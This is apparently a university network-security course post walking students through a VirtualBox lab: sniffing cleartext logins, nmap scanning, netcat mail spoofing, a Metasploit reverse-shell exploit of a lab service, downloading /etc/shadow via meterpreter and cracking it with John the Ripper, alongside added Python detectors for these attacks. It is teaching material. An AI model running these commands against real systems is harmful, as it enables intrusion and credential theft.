This post is mainly addressed to students of the Network Security course. However, anyone can read and comment on this post, though the content should be viewed from a didactic point of view.
Below is a summary of what we saw in class on Tuesday 4th and Thursday 6th December 2012. Please note that simply copying and pasting the commands is the wrong approach; instead, try other options and study what each command can do. Students must be encouraged to understand a tool before using it.
VIRTUALBOX CONFIGURATION
Alice machine
User: alice
Password: alice
IP: 192.168.1.2
Bob machine
User: bob, root
Password: bob
IP: 192.168.1.1
BackTrack5r3 machine
User: root
Password: toor
IP: no default IP
Start the Desktop Environment
After you have logged on BackTrack, run the following command:
~# startx
Internal Network Configuration
Open terminator and run the following command:
~# ifconfig eth1 192.168.1.4
Switch from Internal Network to NAT or Bridged Adapter
– Right click on the network icon and select Network Adapters
– Change the Attached to option from Internal Network to NAT (or Bridged Adapter) and press OK. Make sure the selected network interface is the one actually in use: for instance, if you are connected via WiFi, it must be the wireless adapter.
– Open terminator and run the following commands:
~# /etc/init.d/wicd start
# wicd-gtk --no-tray
– Press the Connect button. If it is already connected, first press the Disconnect button.
Switch from NAT or Bridged Adapter to Internal Network
– Right click on the network icon and select Network Adapters
– Change the Attached to option from NAT (or Bridged Adapter) to Internal Network and press OK
~# wicd-gtk --no-tray
– Press the Disconnect button.
– Open terminator and run the following commands:
~# /etc/init.d/wicd stop
# ifconfig eth1 192.168.1.4
WIRESHARK AND SNIFFING
Local Sniffing
– Open Wireshark in BackTrack5r3 by running the following command:
~# wireshark
– Open the Interfaces window: CTRL+I
– Select eth1 and click on Start
– Open Firefox and go to: http://192.168.1.2 (Alice’s web server)
– Click on Alice’s Message Board and log in: bob/bob123 or alice/alice123
– Go back to Wireshark, right click on an HTTP or TCP packet and select Follow TCP Stream
– Look at the whole stream and notice data about login!
Remote Sniffing
– Right click on the network icon of BackTrack5r3 and select Network Adapters
– Set the Promiscuous Mode option to Allow VMs and press OK
– Open Wireshark in BackTrack5r3 by running the following command:
~# wireshark
– Open the Interfaces window: CTRL+I
– Select eth1 and click on Start
– Open Firefox on Alice’s machine and go to: http://192.168.1.1 (Bob’s web server)
– Log in to the web site: bob/bob123
– Go back to Wireshark, right click on an HTTP or TCP packet and select Follow TCP Stream
– Look at the whole stream and notice data about login!
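What both exercises above make visible (the login crossing the wire in the clear) can be turned into a check. The following is an added example, not part of the original post: it scans text in the shape of what Follow TCP Stream shows and reports every request that carries a cleartext credential, either a password field in a form body or an HTTP Basic header. The sample stream, paths and field names are constructed assumptions.

```python
import base64
import re
from urllib.parse import parse_qs

# Constructed text in the shape of what "Follow TCP Stream" shows for the
# message-board login over plain HTTP; not a real capture from the lab.
SAMPLE_STREAM = (
    "POST /login.php HTTP/1.1\r\nHost: 192.168.1.2\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 28\r\n\r\n"
    "username=bob&password=bob123"
    "HTTP/1.1 302 Found\r\nLocation: /board.php\r\n\r\n"
    "GET /admin/ HTTP/1.1\r\nHost: 192.168.1.2\r\n"
    "Authorization: Basic YWxpY2U6YWxpY2UxMjM=\r\n\r\n"
)
# Request line, then headers up to the blank line; the body follows it.
REQUEST_RE = re.compile(r"(GET|POST|PUT) (\S+) HTTP/1\.[01]\r\n(.*?)\r\n\r\n", re.S)
SECRET_FIELD = re.compile(r"pass|pwd|secret", re.I)
USER_FIELD = re.compile(r"user|login|email", re.I)

def parse_headers(raw):
    headers = {}
    for line in raw.split("\r\n"):
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers

def find_cleartext_credentials(stream):
    """Report each request whose credential a sniffer can read (password itself omitted)."""
    findings = []
    for m in REQUEST_RE.finditer(stream):
        method, path, raw_headers = m.groups()
        headers = parse_headers(raw_headers)
        request = f"{method} {path}"
        # HTTP Basic auth is base64, not encryption: decode it and report the user.
        auth = headers.get("authorization", "")
        if auth.lower().startswith("basic "):
            user = base64.b64decode(auth[6:]).decode("utf-8", "replace").split(":", 1)[0]
            findings.append({"request": request, "kind": "basic-auth", "user": user})
        # Form logins: the body is Content-Length bytes right after the blank line.
        body = stream[m.end():m.end() + int(headers.get("content-length", 0))]
        if "x-www-form-urlencoded" in headers.get("content-type", ""):
            fields = parse_qs(body)
            if any(SECRET_FIELD.search(k) for k in fields):
                user = next((v[0] for k, v in fields.items() if USER_FIELD.search(k)), "?")
                findings.append({"request": request, "kind": "form-password", "user": user})
    return findings

if __name__ == "__main__":
    for f in find_cleartext_credentials(SAMPLE_STREAM):
        print(f"{f['request']}: {f['kind']} credential for user {f['user']!r}")
```

Any hit in this report is a login that should move to HTTPS; the same logic applied to a real capture is what a network monitor does to flag cleartext authentication.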
NMAP
Host Discovery
~# nmap -sn 192.168.1.0/24
Port scanning
TCP connect scan
~# nmap -sT 192.168.1.2
TCP SYN scan
~# nmap -sS 192.168.1.2
UDP scan
~# nmap -sU -p 21-25 192.168.1.2
Detection of the service version
~# nmap -sV -p 80 192.168.1.2
OS detection
~# nmap -O 192.168.1.2
OS and Version detection, traceroute
~# nmap -A 192.168.1.2
If you want to get more information add the -v option to your commands.
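Seen from the scanned host, each of the scans above is a burst of SYN packets to many ports in a few seconds, which a firewall log records. The following is an added example, not part of the original post: it parses constructed iptables LOG lines and flags any source that hits five or more distinct ports on one host within a ten-second window. The log format, addresses and thresholds are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed iptables LOG lines in syslog shape, as Alice's host would record
# them while BackTrack (192.168.1.4) runs the SYN scan above; not real lab output.
SAMPLE_LOG = """\
Dec 06 10:01:00 alice kernel: IN=eth0 SRC=192.168.1.1 DST=192.168.1.2 PROTO=TCP SPT=40001 DPT=80 SYN
Dec 06 10:01:01 alice kernel: IN=eth0 SRC=192.168.1.4 DST=192.168.1.2 PROTO=TCP SPT=51001 DPT=21 SYN
Dec 06 10:01:01 alice kernel: IN=eth0 SRC=192.168.1.4 DST=192.168.1.2 PROTO=TCP SPT=51002 DPT=22 SYN
Dec 06 10:01:01 alice kernel: IN=eth0 SRC=192.168.1.4 DST=192.168.1.2 PROTO=TCP SPT=51003 DPT=23 SYN
Dec 06 10:01:02 alice kernel: IN=eth0 SRC=192.168.1.4 DST=192.168.1.2 PROTO=TCP SPT=51004 DPT=25 SYN
Dec 06 10:01:02 alice kernel: IN=eth0 SRC=192.168.1.4 DST=192.168.1.2 PROTO=TCP SPT=51005 DPT=80 SYN
Dec 06 10:01:03 alice kernel: IN=eth0 SRC=192.168.1.4 DST=192.168.1.2 PROTO=TCP SPT=51006 DPT=443 SYN
Dec 06 10:05:00 alice kernel: IN=eth0 SRC=192.168.1.1 DST=192.168.1.2 PROTO=TCP SPT=40002 DPT=22 SYN
"""
LINE_RE = re.compile(
    r"^(\w{3} \d\d \d\d:\d\d:\d\d) .*SRC=(\S+) DST=(\S+) PROTO=TCP SPT=\d+ DPT=(\d+) .*SYN"
)

def parse_syn_events(log_text):
    """Return a list of (timestamp, src, dst, dport) for every logged SYN."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m.group(1), "%b %d %H:%M:%S")
            events.append((ts, m.group(2), m.group(3), int(m.group(4))))
    return events

def detect_port_scans(log_text, min_ports=5, window_s=10):
    """Flag (src, dst) pairs where one source hit >= min_ports distinct ports on one
    host within window_s seconds (the footprint of nmap -sS / -sT). Returns
    {(src, dst): largest number of distinct ports seen in any window}."""
    by_pair = defaultdict(list)
    for ts, src, dst, dport in parse_syn_events(log_text):
        by_pair[(src, dst)].append((ts, dport))
    alerts = {}
    for pair, events in by_pair.items():
        events.sort()
        for i, (t_end, _) in enumerate(events):
            # Distinct ports inside the window that closes at this event.
            ports = {p for t, p in events[:i + 1] if (t_end - t).total_seconds() <= window_s}
            if len(ports) >= min_ports:
                alerts[pair] = max(alerts.get(pair, 0), len(ports))
    return alerts

if __name__ == "__main__":
    for (src, dst), n in detect_port_scans(SAMPLE_LOG).items():
        print(f"possible port scan: {src} -> {dst} ({n} distinct ports)")
```

A host discovery sweep (nmap -sn) looks different, many destinations from one source rather than many ports on one destination, and needs its own rule.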
TELNET & NETCAT
– Telnet is used for interactive communication with another host using the TELNET protocol. You can log in to other systems if you know the credentials.
~# telnet 192.168.1.2 23
Login: alice
Password: alice
$ ls
– Netcat is a simple utility that reads and writes data across network connections using the TCP or UDP protocol. For instance, you could send anonymous e-mails if you find an SMTP server that permits anonymous connections.
~# nc <SMTP_SERVER_IP> 25
HELO francesco
MAIL FROM: my@mail.com
RCPT TO: other@mail.com
DATA
From: my@mail.com
To: other@mail.com
Subject: <your_subject>
<your body here>
.
QUIT
Or you can fetch a web page’s source by sending a GET request to a web server (after the request line press Enter twice: the empty line terminates the request):
~# nc 192.168.1.2 80
GET / HTTP/1.0
Or, again, you can connect to the echod daemon running on the Bob machine and send some strings:
~# nc 192.168.1.1 12345
hello!
OPENVAS
Run the OpenVAS bash script in BackTrack5r3:
~# cd Desktop
# ./run_openvas.sh
Use Greenbone Security Desktop or open Greenbone Security Assistant in Firefox: http://127.0.0.1:9392
User: openvasadmin
Pass: openvasadmin
Create a new target (192.168.1.1 for Bob or 192.168.1.2 for Alice), then create a new task and start the scanning. When the scanning is over, read the report and consult the vulnerabilities.
METASPLOIT FRAMEWORK
Once you have discovered a vulnerability you can use the Metasploit Framework to exploit the bug. Open terminator and run the following commands (please be patient when you run msfconsole, it takes a while to start):
~# msfconsole
msf> help
msf> search port:<port_number> type:exploit <key>
msf> use <path_exploit>
msf> set <exploit_variable> <value>
msf> show payloads
msf> set PAYLOAD <payload_name>
msf> set <payload_variable> <value>
msf> show options
msf> set RHOST <value>
msf> set RPORT <value>
msf> set LHOST <value>
msf> set LPORT <value>
msf> exploit
msf> help
msf> exit (when you finish)
For example, if you want to attack Bob’s machine, you can exploit the echod service:
~# msfconsole
msf> search type:exploit echo
msf> info exploit/linux/appseclab/echod
msf> use exploit/linux/appseclab/echod
msf> show options
msf> show payloads
msf> set PAYLOAD linux/x86/shell_reverse_tcp
msf> set ENCODER generic/none
msf> set RHOST 192.168.1.1
msf> set RPORT 12345
msf> set LHOST 192.168.1.4
msf> set LPORT 3333
msf> exploit
ls
cd /home/bob
ls
exit
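On the Bob machine the session above is visible as an established connection from a shell process to BackTrack on port 3333, opened from a local port that no service listens on. The following is an added example, not part of the original post: it parses constructed ss -tnp output and flags exactly that shape of connection. The sample output and the list of shell-like programs are assumptions.

```python
import re

# Constructed `ss -tnp` output as seen on the Bob machine after the
# shell_reverse_tcp payload above has connected back to BackTrack;
# not real lab output.
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port   Process
LISTEN 0      5      0.0.0.0:12345       0.0.0.0:*           users:(("echod",pid=1234,fd=3))
LISTEN 0      128    0.0.0.0:80          0.0.0.0:*           users:(("apache2",pid=900,fd=4))
ESTAB  0      0      192.168.1.1:80      192.168.1.2:44102   users:(("apache2",pid=901,fd=9))
ESTAB  0      0      192.168.1.1:12345   192.168.1.4:51877   users:(("echod",pid=1234,fd=4))
ESTAB  0      0      192.168.1.1:53122   192.168.1.4:3333    users:(("sh",pid=1301,fd=0))
"""
ROW_RE = re.compile(
    r'^(\S+)\s+\d+\s+\d+\s+(\S+):(\d+|\*)\s+(\S+):(\d+|\*)\s+users:\(\("([^"]+)",pid=(\d+)'
)
# Programs that have no business holding a network socket of their own on a server.
SHELL_LIKE = {"sh", "bash", "dash", "nc", "python", "perl"}

def parse_ss(ss_text):
    """Return one (state, local_port, peer, process, pid) tuple per socket row."""
    rows = []
    for line in ss_text.splitlines():
        m = ROW_RE.match(line)
        if m:
            state, _laddr, lport, paddr, pport, proc, pid = m.groups()
            rows.append((state, lport, f"{paddr}:{pport}", proc, int(pid)))
    return rows

def find_reverse_shells(ss_text):
    """Flag established connections that are outbound (the local port is not one
    we listen on) and owned by a shell-like process: the shape of a reverse shell."""
    rows = parse_ss(ss_text)
    listening = {lport for state, lport, *_ in rows if state == "LISTEN"}
    alerts = []
    for state, lport, peer, proc, pid in rows:
        if state == "ESTAB" and lport not in listening and proc in SHELL_LIKE:
            alerts.append({"pid": pid, "process": proc, "peer": peer})
    return alerts

if __name__ == "__main__":
    for a in find_reverse_shells(SAMPLE_SS):
        print(f"suspicious outbound shell: pid {a['pid']} ({a['process']}) -> {a['peer']}")
```

The inbound client of echod on port 12345 is expected and is not reported; an egress firewall rule on Bob that blocks outbound connections from the server would stop the callback altogether.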
Try the same exploit using the linux/x86/meterpreter/reverse_tcp payload and steal the system passwords:
msf> set PAYLOAD linux/x86/meterpreter/reverse_tcp
msf> exploit
meterpreter> help
meterpreter> download /etc/shadow ~/Desktop
meterpreter> exit
Crack the password hashes in the shadow file using John The Ripper.
JOHN THE RIPPER
Open terminator and run the following commands:
~# cd /pentest/passwords/john
# rm john.pot
# ./john ~/Desktop/shadow
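Which entries John gets through quickly depends mostly on the hashing scheme in the password field. The following is an added example, not part of the original post: it parses constructed /etc/shadow lines and reports accounts with no password and hashes in schemes (traditional DES, MD5-crypt) that are cracked far faster than SHA-512-crypt. The sample entries and hash strings are made up.

```python
# Constructed /etc/shadow lines in the shape of the file downloaded above;
# the hash strings are made up and correspond to no real password.
SAMPLE_SHADOW = """\
root:aBcDeFgHiJkLm:15680:0:99999:7:::
bob:$1$saltsalt$MadeUpMd5HashValue/:15680:0:99999:7:::
alice:$6$saltsalt$MadeUpSha512HashValue:15680:0:99999:7:::
guest::15680:0:99999:7:::
daemon:*:15680:0:99999:7:::
sshd:!:15680:0:99999:7:::
"""

# crypt(3) scheme ids and whether a cracker like John gets through them fast.
SCHEMES = {
    "1": ("MD5-crypt", "weak"),
    "2a": ("bcrypt", "ok"), "2b": ("bcrypt", "ok"),
    "5": ("SHA-256-crypt", "ok"),
    "6": ("SHA-512-crypt", "ok"),
    "y": ("yescrypt", "ok"),
}

def classify_hash(field):
    """Map a shadow password field to (scheme name, verdict)."""
    if field == "":
        return ("none", "empty")          # login with no password at all
    if field[0] in "!*":
        return ("locked", "ok")           # password login disabled
    if field.startswith("$"):
        return SCHEMES.get(field.split("$")[1], ("unknown", "review"))
    return ("DES-crypt", "weak")          # traditional 13-char hash, only 8 password chars count

def audit_shadow(shadow_text):
    """Return [(user, scheme, verdict)] for the accounts that need attention."""
    findings = []
    for line in shadow_text.splitlines():
        if not line or line.startswith("#"):
            continue
        user, field = line.split(":", 2)[:2]
        scheme, verdict = classify_hash(field)
        if verdict != "ok":
            findings.append((user, scheme, verdict))
    return findings

if __name__ == "__main__":
    for user, scheme, verdict in audit_shadow(SAMPLE_SHADOW):
        print(f"{user}: {scheme} ({verdict})")
```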
VULNERABLE CONFIGURATIONS
Run the following command on Alice’s machine:
~# xhost +
Now, run the command below on BackTrack5r3:
~# xtv -d 192.168.1.2:0.0
DEMO VIDEOS
For better quality, please watch the following videos on YouTube. Select the HD resolution and maximize to full screen.
Local and Remote Sniffing with Wireshark
An example of attack: nmap and metasploit framework